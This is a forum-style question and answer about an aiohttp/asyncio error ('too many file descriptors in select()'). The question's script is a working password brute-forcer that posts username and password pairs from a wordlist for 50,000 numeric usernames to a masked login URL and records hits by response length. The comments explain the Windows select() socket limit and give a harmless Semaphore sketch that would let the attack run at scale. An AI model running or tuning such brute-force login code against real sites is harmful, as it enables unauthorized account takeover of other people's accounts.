aiohttp error message in Python
A web crawler built with aiohttp and asyncio fails when there are too many URLs, with this error: ValueError: too many file descriptors in select()
import aiohttp
import asyncio
import time

# time.clock() is deprecated and was removed in Python 3.8; use perf_counter()
timeclock = time.perf_counter()

# Load the candidate passwords, one per line
pwd_all = []
with open("pwd.txt", "r", encoding='utf-8') as fob:
    for b in fob.readlines():
        pwd_all.append(b.strip())

oklist = []

async def hello(name):
    # Every task opens its own session, and therefore its own socket
    async with aiohttp.ClientSession() as session:
        for pwd in pwd_all:
            payload = {'name': name, 'password': pwd}
            async with session.post('http://www.xxxxxxx.com', data=payload) as resp:
                backdata = await resp.text()
                if len(backdata) == 376:
                    oklist.append("{}:{}".format(name, pwd))
                    break

loop = asyncio.get_event_loop()
# All 50,000 coroutines are scheduled at once; this is what triggers the error
tasks = [hello(str(uname)) for uname in range(10000,60000)]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
print(oklist)
print("time is:" + str(time.perf_counter() - timeclock))
Comments (2)
tasks = [hello(str(uname)) for uname in range(10000,12000)]
Try a smaller range first. Starting with 50,000 tasks right away is far too many.
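On Windows, asyncio's selector-based event loop calls the underlying select(), which can only monitor a limited number of sockets at once; exceed that limit and you get this error. (The limit was given here as 1024; the asyncio documentation lists 512 sockets for SelectSelector on Windows.) What counts is the number of concurrent connections, not threads, so it is best to limit how many requests are in flight at the same time. You can do that with asyncio.Semaphore(number), which caps concurrency rather than acting as a thread pool.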
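The answer's own example is not included here. The following is only a minimal sketch of the Semaphore approach, not the answerer's code. It uses the standard library alone: fake_request, limited, run_demo and MAX_CONCURRENCY are hypothetical names, and asyncio.sleep stands in for the session.post(...) call from the question.

```python
import asyncio

MAX_CONCURRENCY = 100  # assumed cap; keep it well below the select() limit


async def fake_request(name, state):
    # Hypothetical stand-in for the aiohttp session.post(...) call.
    # It only tracks how many "requests" are in flight at once.
    state["active"] += 1
    state["peak"] = max(state["peak"], state["active"])
    await asyncio.sleep(0.001)
    state["active"] -= 1
    return name


async def limited(sem, name, state):
    # At most `limit` coroutines hold the semaphore at the same time;
    # the rest wait here without opening any socket.
    async with sem:
        return await fake_request(name, state)


async def main(names, limit=MAX_CONCURRENCY):
    sem = asyncio.Semaphore(limit)  # created inside the running loop
    state = {"active": 0, "peak": 0}
    results = await asyncio.gather(*(limited(sem, n, state) for n in names))
    return results, state["peak"]


def run_demo(count=1000, limit=MAX_CONCURRENCY):
    # Returns the results and the highest concurrency actually observed.
    return asyncio.run(main(range(count), limit))


if __name__ == "__main__":
    results, peak = run_demo()
    print(len(results), "requests finished; peak concurrency:", peak)
```

Applied to the question's code, the `async with sem:` block would need to wrap the whole body of hello(), including the creation of the ClientSession, since each task opens its own session there. Sharing a single ClientSession across all tasks would probably reduce the number of open sockets further.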